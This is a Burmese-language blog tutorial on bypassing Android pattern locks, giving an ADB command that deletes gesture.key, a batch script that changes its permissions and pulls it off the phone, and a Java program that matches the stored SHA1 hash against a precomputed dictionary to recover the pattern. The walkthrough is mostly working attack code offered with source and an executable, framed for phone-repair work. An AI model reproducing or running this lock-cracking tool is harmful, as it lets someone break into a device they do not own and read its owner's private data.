Radio

bg

ADB & Java Pattern Lock Attacking



Post ကို ဖတ်ရင် ကျေးဇူးပြု၍ အောက်ဆုံးတွင်ပါသော PDF ဖိုင်အဖြစ် ဖတ်နိုင်ပါတယ်၊ သရုပ်ပြပုံတွေပါလို့ပါ၊

Android phone အသုံးပြုသူအချို့က သူတို့ဖုန်းတွေကို လုံခြုံရေးအတွက် Pattern Lock ချထားတတ်ကြပါတယ်၊ Pattern Lock ချထားခြင်းက လုံးခြုံရေး အတွက်သာလျှင်မကဘဲ ဖုန်းဖွင့်တဲ့အခါ စတိုင်လေးနဲ့ဖုန်းကိုပွတ်လိုက်ရတဲ့အရသာကလဲ Personality ဘဲ ပိုမြင့်သလိုလိုခံစားရတဲ့အချက်လဲပါတယ်၊ ဖုန်းကို Pattern Lock ချထားရင် Lock ဖို့သုံးတဲ့ Key combination တွေကို gesture.key ဖိုင်တစ်ခုအဖြစ်ဖန်တီးပြီးတော့ 20 byte SHA1 Hash နဲ့ encrypt လုပ်ပြီးသိမ်းပါတယ်၊ သဘောက 14789 ဆိုပြီး lock လုပ်ထားတဲ့ pattern တစ်ခုကို “C8C0B24A15DC8BBFD411427973574695200458F0” ဆိုတဲ့တန်ဖိုးနဲ့သိမ်းထားမှာ၊ SHA1 နဲ့ encrypt လုပ်ပြီဆိုရင် hexadecimal တန်ဖိုး အလုံး 40 ပါမှာဖြစ်ပြီး MD5 ကတော့ Hexadecimal 32 လုံးပါပါတယ်၊
Android ဖုန်းဝန်ဆောင်မှုလုပ်ငန်းလုပ်သူတိုင်းအတွက် Pattern Lock ဖြေတယ်ဆိုတဲ့အချက်က ကလေးကွက်လေးလို့ ပြောချင်စရာကောင်းလောက်အောင် လွယ်လှပါတယ်၊ Pattern Lock ကို အောက်ကဥပမာကလို ADB command လေးအလွယ်သုံးပြီးဖြတ်နိုင်တယ်၊နိုင်တယ်၊
adb shell su -c "rm /data/system/gesture.key"

အထက်က Command ကတော့ data partition ထဲရှိ system ဖိုဒါမှ gesture.key ဖိုင်ကို ဖယ်ပြစ်လိုက်တာပါ၊(ဖြတ်ပြစ်လိုက်တာပါ၊ Recovery လုပ်ဖို့တော့ မစဉ်းစားသင့်ဘူး Android မှာ bin [အမှိုက်ပုံးမပါဘူး ])
Adb command ကိုကျွမ်းကျင်သူတွေအနေနဲ့ ဘယ်နည်းနဲ့ပဲဖြည်ဖြည့် Pattern Lock ကို ဖြည်ဖို့က အလွယ်လေးဖြစ်ပါမယ်၊ ဒီ ပိုစ်မှာ လည်း Pattern Lock အကြောင်းကို ရေးသွားမှာပါ၊ ရေးသွားမှာက ဖြတ်နည်းအစား Pattern Lock Keys တွေကိုရှာတဲ့ Program ကိုရေးမှာ၊ မဖြတ်ပစ်ပဲ Key ကိုရှာမယ်ဆိုတဲ့သဘောပါ၊ (အွန်လိုင်းပေါ်မှာ ပြည်တွင်းပြည်ပက မိတ်ဆွေအတော်များများလဲ ဒီလိုလုပ်ကြတယ်)၊
ဒီပိုစ်ရဲ့ Pattern Lock ရှာတဲ့ Program ကို တည်ဆောက်တဲ့အခါ ADB နဲ့ Java တွဲပြီးတည်ဆောက်သွားမယ်၊ (လာပြန်ပြီ Java လို့တော့ မလုပ်ပါနဲ့၊ ကျွန်တော်တို့လဲ တကယ် အလုပ်မအားလှဘူး၊ ဒီတော့ C++ တို့ Python တို့နဲ့နောက်မှဘဲရေးတာပေါ့၊ လက်ယာဉ်နေတဲ့ Java နဲ့ ဘဲကစ်လိုက်ဥုံးမယ်)၊
တည်ဆောက်သွားမယ့် Program ရဲ့ အဆင့်ဆင့်တွေးခေါ်ပုံ၊
၁. အရင်ဆုံး ADB သီးသန့်သုံးပြီး gesture.key ဖိုင်ကို data/system/ ထဲကနေ ထုတ်ယူပြီး adb ရှိတဲ့ ဖိုဒါထဲမှာ ထည့်ထားမယ်၊
၂. ရလာတဲ့ gesture.key ဖိုင်ကိုဖတ်ဖို့ Java နဲ့ UI Frame တစ်ခုတည်ဆောက်မယ်၊
၃. Java Program ကနေ JButton လေးကိုခလစ်နှိပ်တာနဲ့ အဆင့် ၁ မှာ ရယူထားတဲ့ gesture.key ဖိုင်ထဲက SHA1 encrypt Hexa တန်ဖိုးတွေကိုဖတ်မယ်၊
၎. ရလာတဲ့ Hexa တန်ဖိုးတွေကို GestureKeyDictionary နဲ့ တိုက်စစ်မယ်၊
၅. အဖြေကို JLabel ထဲမှာဖော်ပြပေးမယ်၊
လိုက်လုပ်ဖို့ အတွက်လိုအပ်ချက်များ
အရင်ဆုံး GestureKeyDictionary ဒေါင်းလုပ်လုပ်ထားပါ၊
ကွန်ပြူတာရဲ့ E drive ထဲမှာ adb ဆိုတဲ့နာမည်နဲ့ Folder တစ်ခုတည်ဆောက်ပြီး adb.exe, AdbWinApi.dll, AdbWinUsbApi.dll ဖိုင်တွေကိုထည့်ထားပါ၊ (E drive မသုံးပဲ အခြား Drives တွေထဲက စိတ်ကြိုက်တစ်ခုကိုလည်းသုံးနိုင်တယ်၊ ဒါပေမယ့် ဒီပိုစ်မှာတော့ E drive ကိုသုံးသွားမယ်၊)၊ နောက်ထပ် လိုအပ်ချက်တစ်ခုကတော့ AndroidGestureSHA1.rar ဖြစ်ပြီးတော့ အောက်ကလင့်မှာသွားဒေါင်းနိုင်တယ်၊ ဒေါင်းပြီးရင် rar ဖိုင်ကိုဖြည်ပြီး ရလာတဲ့ AndroidGestureSHA1.txt ဖိုင်ကို SHA1.txt လို့နာမည်ပြောင်း၊ ပြီးရင် အထက်က တည်ဆောက်ခဲ့တဲ့ E drive ထဲက adb ဖိုဒါထည်း ထည့်ထား၊
www.android-forensics.com/tools/AndroidGestureSHA1.rar
အထက်က အချက်တွေအားလုံးစီစဉ်ပြီးရင် စမယ်၊
1. gesture.key ဖိုင်အားရယူခြင်း
အရင်ဆုံး Java Program မှာ မရေးခင် စမ်းသပ်တဲ့အနေနဲ့ batch ဖိုင်တစ်ခုအနေနဲ့ရေးမှာ၊ မရေးခင်စဉ်းစားရမှာက လုံချုံရေးအဆင့်မြင့်တဲ့ ဖုန်းတွေမှာ Read, Write access မပေးထားဘူး၊ ဒါ့ကြောင့် ဖိုင်ကိုရယူတဲ့အခါ ယူလို့မရတဲ့ပြဿနာမျိုးတတ်တတ်တယ်၊ ဒီလိုပြဿနာ မတတ်အောင်လို့ အရင်ဆုံး gesture.key ဖိုင်ကို permission ပြောင်းထားသင့်တယ်၊ (မပြောင်းချင်လဲရတယ်)၊ ပြီးမှ ဖိုင်ကို ဆွဲယူမယ်၊ Java Program မှာ တိုက်ရိုက်စရေးရင် ရပြီဖြစ်ပေမယ့် တစ်ဆင့်စီ မှန်အောင် အလုပ်လုပ်သွားနိုင်ဖို့ အတွက် အရင်ဆုံး batch ဖိုင်နဲ့ရေးမယ် အောက်ကအတိုင်း

@echo Off
Title Brighter Myanmar
@echo off
adb shell su -c "chmod 666 /data/system/gesture.key"
adb pull /data/system/gesture.key
adb shell su -c "chmod 666 /data/system/gesture.key"
adb pull /data/system/gesture.key

အထက်က Command ရဲ့ပထမ အကြောင်းကတော့ adb “su” ကိုသုံးပြီး data partition ရဲ့ system ဖိုင်ထည်းက gesture.key ဖိုင်ကို Group , User နဲ့ Other တို့ အတွက် Read & Write permission ပြောင်းလိုက်တာပါ၊ (တစ်ချို့တော့မလိုအပ်ဘူး ပြောင်းဖူးသားမို့လားမသိပါ)၊ ဒုတိယ Command ကတော့ တော့ adb pull command ကိုသုံးပြီး data/system/gesture.key ဖိုင်ကိုဆွဲထုတ်တာ၊ batch အနေနဲ့ ရေးတဲ့အခါ Destination ထည့်စရာမပေမယ့် Java နဲ့ရေးရင်တော့ ထည့်ရမယ်၊ အထက်က လိုရေးပြီးစမ်းကြည့် gesture.key ဖိုင်ကိုရရင် အခုသုံးတဲ့ adb command တွေမှန်တယ်၊ ဒီတော့ ပထမအဆင့် အောင်ဘီ၊

2. ဒီအဆင့်မှာတော့ Java Program အတွက် User Interface လေးတစ်ခုတည်ဆောက်သွားမယ်၊ အောက်က ပုံအတိုင်း



ရုပ်ထွက်ကတော့ ရှယ်မလှဘူး၊ Frame တစ်ခုလုံးကို Custom တည်ဆောက်တာတို့ JButton တို့ JLabel တို့ကို စိတ်ကြိုက် ဒီဇိုင်း ဖန်တီးတာတို့ အခု ပိုစ့်ရဲ့ ရည်ရွယ်ချက်မဟုတ်တော့ ရိုးရိုးရှင်းရှင်းလေးပဲဆက်မယ်၊ အထက်ကပုံကိုကြည့်ရင် အခြေခံ Java လေးလာဖူးသူတွေအနေနဲ့ Jframe, JPanel, JButton နဲ့ JLabel components လေးခုပါတယ်ဆိုတာသိနိုင်ပါတယ်၊ တည်ဆောက်တာကို အမြန်ပဲပြောသွားမယ်၊

package com.biber.waifer;

public class Biberkolar {
public static void main(String[] args) {
new BrighterGeneration();
}
}

အရင်ဆုံး Biberkolar Class ကိုတည်ဆောက်လိုက်တယ်၊ ပြီးတော့ main method တည်ဆောက်တယ်၊ main method ထဲမှာ BrighterGeneration Class ကို Instantiate စလုပ်ထားတယ်၊ ဒီသဘောက Program Run တာနဲ့ စအလုပ်လုပ်မယ့် main method က BrighterGeneration Class ကိုလှမ်းနိုးမယ် ဆိုတဲ့ သဘော၊ အခု BrighterGeneration Class ကိုသွားတည်ဆောက်မယ်၊

public class BrighterGeneration extends JFrame {
private JPanel BrighterPanel;
private JButton BrighterButton;
private JTextField BrighterResult;
public BrighterGeneration() {

}
}

အထက်က Code ကိုကြည့်ရင် BrighterGeneration Class မှာ JFrame ကို extends လုပ်ထားတာတွေ့ရမယ်၊ private access modifier သုံးပြီး JPanel,JButton,JtextField components သုံးခုအတွက် BrighterPanel, BrighterButton နဲ့ BrighterResult တို့ကိုတည်ဆောက်တယ်၊ အောက်မှာ Constructor တည်ဆောက်တယ်၊ ဒီနေရာမှာ ရှေ့က တည်ဆောက်ခဲ့တဲ့ Biberkolar Class ထဲရှိ main metod မှာ BrighterGeneration Class ကို Institiate လုပ်တာနဲ့ BrighterGeneration Class ရဲ့ Constuctor က အခေါ်မခံရပဲ အလိုလျှောက်အလုပ်လုပ်မယ်ဆိုတာကို သဘောပေါက်ပါ၊ (ဒါက Constructors တွေရဲ့ သဘာဝ)၊ ပြီးရင်အောက်ကအ တိုင်း ဆက်ရေးမယ်၊

BrighterPanel = new JPanel();
BrighterButton = new JButton("ဒီကိုနှီပ်ရင်");
BrighterButton.setPreferredSize(new Dimension(150,150));
BrighterButton.setFont(new Font("Zawgyi-One",3,12));
BrighterResult = new JTextField("ဒီမှာအဖြေရမယ်");
BrighterResult.setBorder(BorderFactory.createLineBorder(Color.black));
BrighterResult.setPreferredSize(new Dimension(150,150));
BrighterResult.setFont(new Font("Zawgyi-One",3,12));
BrighterPanel.setBackground(Color.GRAY);

အထက်က Code Snippet မှာတော့ BrighterPanel ကို refrencing လုပ်တယ်၊ ဒီလိုပဲ BrighterButton နဲ့ BrighterResult တို့ကိုလဲ refrencing လုပ်တယ်၊ ဗမာစာသုံးထားတဲ့အတွက် font မှန်မှန်ပေါ်အောင် setFont method ကို BrighterButton နဲ့ BrighterResult Object နှစ်ခုပေါ်မှာခေါ်သုံးပြီးတော့ Zawgyi-One ဖောင့်ကိုပြောင်းထားတယ်၊ ဒုတိယ Parameter က စာလုံးထူးစောင်း (bold & Italic) အတွက်၊ 0 ဆိုရင် ပုံမှန်စာလုံး (normal)၊ 1 ဆိုရင်စာလုံးအထူ (bold)၊ 2 ဆိုရင် စာလုံးတစ်စောင်း (italic)၊ 3 ဆိုရင်တော့ bold and Italic ၊ စာသားတန်ဖိုးတွေသတ်မှတ်တာတော့ မထူးဆန်းလို့မပြောတော့ဘူး၊ JLabel ကို Border ထားလိုက်တယ်၊ JButton ကော JLabel ကောအတွက် Dimension ကို 150px အကျယ်နဲ့ အမြင့်ထားတယ်၊ JPanel ကိုတော့ နောက်ခံ မီးခိုးရောင်လားမသိဘူး (Gray) ပေးလိုက်တယ်၊ အခု JPanel ထဲကို JButton နဲ့ JLabel ထည့်မယ်၊ JFrame ထည်းကို JPanel ထည့်မယ်၊ အောက်ကတိုင်း

BrighterPanel.add(BrighterButton);
BrighterPanel.add(BrighterResult);
add(BrighterPanel);
setVisible(true);
setSize(500, 200);
setResizable(false);
ImageIcon i = new ImageIcon(getClass().getResource("logo.gif"));
this.setIconImage(i.getImage());
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
setLocationRelativeTo(null);

JFrame ကို setVisible(true) ထားတာ မြင်ရအောင်၊ သူမပါရင် ခုတည်ဆောက်ထားတဲ့ components တွေအောင်တော့အောင်တယ် မမြင်ရဘူး၊ အရွယ်အစားလဲချိတ်ထားတယ်၊ Resize လုပ်လို့မရအောင်ပိတ်ထားတယ်၊ JFrame မှာပေါ်မယ့် Logo ကို BrighterMyanmar Logo ဖြစ်အောင် ပြောင်းထားတယ်၊ Windwo အလည်မှပေါ်အောင် LocationRelative ကို null ပေးထားတယ်၊ ဒုတိယ အဆင့်ပြီးဘီ၊

3. JButton ကိုနှိပ်တဲ့အချိန်မှာ gesture.key ဖိုင်ကို ဖုန်းထည်းကနေ လှမ်းယူမယ်၊ (အပေါ်ဆုံးမှာ batch နဲ့ယူတာက စမ်းတာ အားလုံးကို Java Program ကဘဲသုံးမှာ)၊ JButton ကိုနှိပ်ရင် လုပ်ငန်းစဉ်တွေအားလုံးဆက်တိုက် ဖြစ်သွားမှာဖြစ်လို့ အရင်ဆုံး JButton ကိုနှိပ်လားမနှိပ်လား သိရအောင် JButton ပေါ်မှာ ဖြစ်ပေါ်တဲ့ Action တွေကိုနားထောင်မယ်၊ တကယ် Action ပေါ်လာရင်အလုပ်စလုပ်မယ်၊ အောက်က အတိုင်း
BrighterButton.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent arg0) {
WaiferStartWorking();
}
});

JButton ပေါ်မှာ addActionListener သုံးပြီးနာထောင်တယ်၊ တကယ် Action ပေါ်လာရရင် Inner Class ဖြစ်တဲ့ ActionListener ကိုသတင်းပေးမယ်၊ ဒါဆို ActionListener က သူ့ရဲ့ implement method ဖြစ်တဲ့ actionPerformed method ကို parameter တစ်ခုပေးပြီး အလုပ်စဆင်းခိုင်းမယ်၊ အထက်က ဥပမာမှာတော့ အလုပ်စဆင်းတာနဲ့ WaiferStartWorking() ဆိုတဲ့ Method ကိုခေါ်ထားတယ်၊ ဒီတော့ JButton ကိုခလစ်နှိပ်တာနဲ့ WaiferStartWorking() method စအလုပ်လုပ်မယ်၊ ဘာတွေလုပ်ခိုင်းမလဲ၊ ရည်ရွယ်ထားတဲ့အတိုင်းပဲ gesture.key ဖိုင်ကို ဖုန်းထည်းကနေ ဆွဲထုတ်မယ်၊ ပြီးရင် E drive ထဲက adb ဖိုဒါထည်းကိုထည့်မယ်၊ အောက်ကအတိုင်း

public void WaiferStartWorking(){
WaiferAdbChangePermission_GetGestureKey(new ProcessBuilder("E:\\adb\\adb", "pull","su -c 'chmod 666 /data/system/gesture.key'"));
WaiferAdbChangePermission_GetGestureKey(new ProcessBuilder("E:\\adb\\adb", "pull","/data/system/gesture.key","E:\\adb"));
WaiferDictionaryAttackr();
}

အထက်က WaiferStartWorking method အလုပ်စလုပ်တာနဲ့ WaiferAdbChangePermission_GetGestureKey() method ထဲကို မတူညီတဲ ProcessBuilder Class Object parameter တွေကိုလှမ်းပစ်တယ်၊ သိပ်မရှင်းပြတော့ဘူး အရင်နေ့က Post မှာရှင်းခဲ့ပြီးပြီ၊ အားလုံး အလုပ်လုပ်မယ့် လုပ်ငန်းစဉ်သုံးခုပါတယ်၊ ပထမတစ်ခုက Permission ပြောင်းမှာ ဒုတိယ တစ်ခုက ဖုန်းထည်းက ဖိုင်ကို E drive ထဲက adb ဖိုဒါထည်းကိုဆွဲယူမှာ တတိယ တစ်ခုက Dictiornay attack နဲ့ တိုက်ခိုက်မှာ၊ ဒီတော့ကာ WaiferAdbChangePermission_GetGestureKey() method မှာဘာတွေတည်ဆောက်ထားလဲဆိုတာ ကိုကြည့်မယ်၊ (အရင် Adb post ကိုနားလည်ရင် ခန့်မှန်းရုံနဲ့သိနိုင်တယ်)၊

public void WaiferAdbChangePermission_GetGestureKey(ProcessBuilder BrighterProcess){
Process pc;
try {
pc = BrighterProcess.start();
pc.waitFor();
} catch (IOException e) {
e.printStackTrace();
} catch (InterruptedException e) {
e.printStackTrace();
}
}

အထက်က Code ကတော့ မိတ်ဆွေတို့အတွက် မဆန်းတော့ပါဘူး၊ ပေးတဲ့ ProcessBuilder Object ကိုဖမ်း ပြီးရင် Process မှာ အလုပ်စတင်၊ Process မပြီးမခြင်းစောင့်ဆိုတဲ့အလုပ်တွေပါ၊ ဆက်မရှင်းတော့ဘူး၊ ယခင်အခန်းကို ဖတ်ဖူးရင်နားလည်မယ် မဖက်ရသေးရင် BrighterMyanmar Posts တွေမှာ ကျေးဇူးပြု ၍ ပြန်ရှာဖတ်ပေးပါ၊
အထက်ကအဆင့်အထိပြီးရင်တော့ E drive ထည်းမှာ gesture.key ဖိုင်ကို အောင်မြင်စွာနဲ့ ဆွဲထုတ်ပြီးဖြစ်မယ်၊ ဒီတော့ WaiferStartWorking ရဲ့ နောက်ဆုံးခေါ်ထားတဲ့ Method ဖြစ်တဲ့ WaiferDictionaryAttackr() စတင်အလုပ်လုပ်မယ် ၊

Dictionary Attack နဲ့ တိုက်မယ်ဆိုတဲ့လုပ်ငန်းစဉ်မှာ လုပ်ဆောင်ချက်နှစ်ခုပါမယ်၊ အရင်ဆုံး gesture.key ဖိုင်ထဲက hexa ကုတ်တွေကိုဖတ်ဖို့နဲ့၊ ဒုတိယ အဆင့်က Hexa Code တွေကို Dictionary နဲ့တိုက်စစ်ဖို့ ဒီတော့ WaiferDictionaryAttackr() ထဲမှာ String Variable တစ်ခုတည်ဆောက်ပြီး WaiferDecoder(); method က return ပေးမယ့် တန်ဖိုး ကို assign လုပ်မယ်၊ အောက်ကအ တိုင်း၊

private void WaiferDictionaryAttackr() {
String s = WaiferDecoder();
}

အထက်ကအတိုင်းဆိုရင် WaiferDecoder() method က တန်ဖိုးတစ်ခုကို မဖြစ်မနေ Return ပြန်ပေးရမယ်၊ အဲ့ဒီ့ ပြန်ပေးမယ့်တန်ဖိုးက gesture.key ထဲက hexa Code တွေကိုဖတ်လို့ရလာတဲ့တန်ဖိုးဖြစ်ရမယ်၊ ဒီတော့ WaiferDecoder() method ကိုတည်ဆောက်ပြီး gesture.key ဖိုင်ကိုအောက်ကအ တိုင်းဖတ်မယ်၊

private String WaiferDecoder() {
FileInputStream fis = null;
ArrayList<String>ar = new ArrayList<String>();
try {
fis = new FileInputStream("E:\\adb\\gesture.key");
while ((i = fis.read()) != -1) {
if (i != -1) {
ar.add(String.format("%02X ", i));
}
}
fis.close();
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
String str = "";
for(String s: ar){
str += s;
}
System.out.println(str.replaceAll(" ",""));
return (str.replaceAll(" ",""));
}

အထက်က Method က တော့ တကယ့်ကို သပ်ရပ်လွန်းလှပါတယ်၊ အရင်ဆုံး FileInputStream Object တစ်ခုတည်ဆောက်တယ်၊ ပြီးတော့ ArrayList တစ်ခုကိုတည်ဆောက်တယ်၊ FileInputStrem Object ရဲ့ လမ်းကြောင်းကို E drive ထဲက adb ဖိုဒါမှာရှိတဲ့ gesture.key ဖိုင်ကိုညွန်းလိုက်တယ်၊ နောက်တစ်ဆင့်မှာစဖတ်တယ်၊ ဖတ်တဲ့အခါ fis ရဲ့တန်ဖိုး -1 နဲ့ တူမခြင်းဖတ်တယ်၊ ဖတ်စရာ Contents ကုန်သွားရင် -1 ဖြစ်သွားမယ်၊ တကယ်တော့ hexa ဖိုင်မှာ စာလုံးနှစ်လုံးတိုင်းမှာ space bar တစ်ချက်စီခြားထားတယ်၊ နောက်ဆုံးစာလုံးပြီးရင် While က Content တန်ဖိုး မရှိတော့တဲ့ -1 ဖြစ်သွားလို့ဆက်ပြီး loop မလုပ်တော့ဘူး၊ အောက်မှာ hexa ဖိုကိုကြည့်ပါ၊



%02X ဆိုတာက Loop တစ်ကြိမ်လုပ်တိုင်း ရလာမယ့် မတူညီတဲ့ i (2- digit byte) တန်ဖိုးတွေကို hexa တန်ဖိုးအနေနဲ့ယူမယ်လို့သတ်မှတ်တဲ့ format ပါ၊
တစ်ကြီမ်း Looping လုပ်တိုင်း ရလာတဲ့ Character တန်ဖိုးကို နှစ်လုံးရလာမယ်၊ ဥမပာ မထမတစ်ကြီမ် C8 ၊ ဒုတိယတစ်ကြိမ် C0 စသဖြင့်စသဖြင့်ပေါ့၊ ရလာတဲ့ တန်ဖိုး နှစ်လုံး တစ်အုပ်စုစီကို ar arry ထည်းကိုထည့်မယ်၊ ဒါပေမယ့် အဲ့ဒီ နှစ်လုံးတစ်ကြိမ်ရလာတဲ့တန်ဖိုး တွေကြားမှာ space bar ပါနေအုံးမယ်၊ အဲ့ဒီ့ space bar တွေကိုဖြော်ကပြစ်မှရမယ်၊ အခုဖြစ်နေတဲ့အခြေအက Array တန်ဖိုးဖြစ်တဲ့အတွက် C8 က Element တစ်ခု C0 က Element တစ်ခုစသဖြင့် နှစ်လုံးတစ်အုပ်စုနဲ့ တစ်အုပ်စုစီရဲ့ကြားမှာ ကော်မာပါနေမယ် အဲ့ဒီ့ Comma တွေကို ဖြတ်ပြီးအားလုံးပေါင်းဖို့ အတွက် Hance for loop ကိုသုံးပြီး Array ရှိသလောက် Elements တွေအရေအတွက်အတိုင်း တစ်ခုစီအဖြေထုတ်၊ တစ်ခါအဖြေထုတ်တိုင်း Stirng s ထဲကို အဖြေတွေကိုပေါင်းထည့်၊ ဒါဆိုရင်လိုချင်တဲ့ Array String ကိုရလာမယ်၊ အဲ့ဒီ့အခါ ကြားထည်းက White space (spacebar) တွေကို replace method သုံးပြီး ဖယ်ထုတ်ပြစ်မယ်၊ ဒါဆိုရင်အောက်ကလို သီးသန့် String ရလာမယ်၊
“C8C0B24A15DC8BBFD411427973574695230458F0”
အထက်က String ကို ရရှိခြင်းက အောင်မြင်ခြင်းရဲ့ လမ်းစပါပဲ၊ အထက်က String ကို H0, H1, H2, H3, H4 (ဒီအကြောင်းနဲ့ Algorithm ကိုနောက်ပိုစ်တွေမှာရှင်းမယ်) ဆိုပြီး အပိုင်း ငါးပိုင်းခွဲလိုက် ပထမအပိုင်းက လိုချင်တဲ့ Code ပဲ၊ တကယ့်နည်း အစစ်ကအဲ့ဒီ့လိုလုပ်ရမှာ၊ ဒါပေမယ့် Dictionary ထဲမှာက တန်ဖိုး အပြည့်နဲ့ တိုက်စစ်ဖို့ပေးထားတဲ့ အတွက် ခု အပိုင်း ငါးပိုင်းမခွဲပဲ အားလုံးနဲ့တိုက်စစ်မယ်၊ ဒီ့အတွက် WaiferDictionaryAttackr() method ကိုပြန်သွားမယ်၊ အောက်က အတိုင်းရေးလိုက် အားလုံးတွဲရှင်းပစ်မယ်၊

private void WaiferDictionaryAttackr() {
String s = WaiferDecoder();
File f = new File("E:\\adb\\SHA1.txt");
StringBuilder st= new StringBuilder();
String line;
try {
br = new BufferedReader(new FileReader(f));
while((line = br.readLine())!= null){
st.append(line);
String ary[] = line.split(";");
if(ary[2].contentEquals(s)){
System.out.println(ary[0]);
BrighterResult.setText(ary[0]);
break;
}
}
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}

တိုက်စစ်မယ့် Dictionary ဖိုင်ကို ၀န်တင်ဖို့ အတွက် File Object တစ်ခုတည်ဆောက်တယ်၊ ပြီးတော့ File ကိုတစ်ကြောင်းစီဖတ်သွားဖို့ အတွက် Buffered Reader Object ကိုတည်ဆောက်ပြီးတစ်ကြောင်းစီဖတ်တယ်၊ ဖတ်တဲ့အခါမှာ နောက်ဆုံး စာကြောင်းနောက်မှာ ဘာစာကြာင်းမှ မရှိတော့တဲ့အထိ ဖတ်မယ်ဆိုပြီး Ending Point ကို While Loop မှာသတ်မှတ်ကာဖတ်တယ်၊ တစ်ကြောင်းဖတ်ပြီးတိုင်း ဖတ်လိုက်တဲ့ စာကြောင်းကို st ဆိုတ့ String Builder မှာ ထည့်ထားတယ်၊ Dictionary ထဲမှာ ရှိတဲ့ တစ်ကြောင်းစီက အောက်က အတိုင်း
1234;00 01 02 03;A02A05B025B928C039CF1AE7E8EE04E7C190C0DB
အထက်က စာကြောင်းကိုသေချာကြည့်ရင် အပိုင်းသုံးပိုင်းတွေ့ရမယ်၊ ပထမအပိုင်းက pattern key combination၊ ဒုတိယ အပိုင်းက Algorithim၊ တတိယအပိုင်းက encrypted SHA1 code၊ အခုတိုက်စစ်ချင်တာက တတိယ အပိုင်းနဲ့တိုင်စစ်ချင်တာ၊ ဒီတော့ Dictionary ထဲက တစ်ကြောင်းစီကိုဖတ်မယ်၊ တစ်ကြောင်းဖတ်တိုင်း အပိုင်းသုံးပိုင်းခွဲမယ်၊ နောက်ဆုံးပိုင်းကိုယူမယ်၊ ဒီ့အတွက် အထက်က encrypted SHA1 ကိုအပိုင်းသုံးပိုင်းပိုင်းဖို့လိုပြီ၊ ဒါကလဲလွယ်ပါတယ်၊ သိသာထင်ရှင်းလှတဲ့ ; ဆင်မှီးကော်လံကိုသုံးပြီးခွဲထုတ်ယ်၊ ပြီးရင် String array ထဲထည့်မယ်၊ ဒီတာ့နောက်ဆုံးအပိုင်းက ary[2] ဖြစ်မယ့် အဲ့ဒီ့ Array 2 နဲ့ အေပ်ါက String s နဲ့တိုက်စစ်မယ်၊ မှန်ရင် Key Combination ဖြစ်တဲ့ ary[0] နေရာက key ကို JLabel ထဲမှာ အဖြေအဖြစ်ထုတ်ပေးမယ်၊

ဆက်မရှင်းတော့ဘူး၊ သေချာလေ့လာကြည့်ရင်လွယ်ပါတယ်၊ သဘောပေါက်ရင် Network Lock ဖြေတဲ့နေရာမျိုးမှာပါကောင်းကောင်းသုံးနိုင်တယ်၊
နောက်ရက်တွေကြလို့ အားခဲ့သည်ရှိသော် pattern lock ကျနေမယ်၊ USB debuggin ကလဲ On မထားဘူး၊ ဆိုတဲ့ အခြေအနေမျိုးမှာ ဘယ်လို ဖြေရှင်းနိုင် မလဲ ဆိုတာ programatic စဉ်းစားပြီးလုပ်ကြည့်ကြမယ်၊ ဒါမှမဟုတ် Adb Wireless Keyboard ပေါ့၊

ပိုစ်အတွက် ထောက်ပံပေးမူ

PDF ဖိုင်အဖြစ်ဒေါင်းရန် -> https://drive.google.com/file/d/0B6obEA4oP-old18tWmNYTjF3YVU/edit?usp=sharing
Java Source Code ဒေါင်းရန် ->https://github.com/waiferkolar/Android-Pattern-Attack/blob/master/.gitignore

Exe file အဖြစ်ရယူရန် -> https://drive.google.com/file/d/0B6obEA4oP-olcU5TOF9LMHJHdGc/edit?usp=sharing





Bright Myanmar ရဲ့ ပို့စ်ဖြစ်ပါတယ်။


[IMG]
[IMG]
ခုလိုအားပေးတဲ့အတွက်ကျေးဇူးပါ..Facebook Page လေးကိုတော့ LIKE ပေးသွားပါဗျာ..လိုအပ်တာတွေကိုလည်း C-box မှာ မှာကြားခဲ့နိုင်ပါတယ်


SHARE ON:

အွန်လိုင်းမှာသွားရင်းလာရင်းတွေ့ရှိသမျှ လေးတွေကို သည်နေရာမှာ လာစုထားခြင်းသာဖြစ်ပါတယ် ဘာကောင် ဘာဘလော့ဂါမှမဟုတ်ပါ။ကျွန်တော်လိုသမျှစုဝေးထားရာတွင် သင်လိုတာများ ရှိနေနိုင်ပါသည်

    Blogger Comment

0 comments:

Post a Comment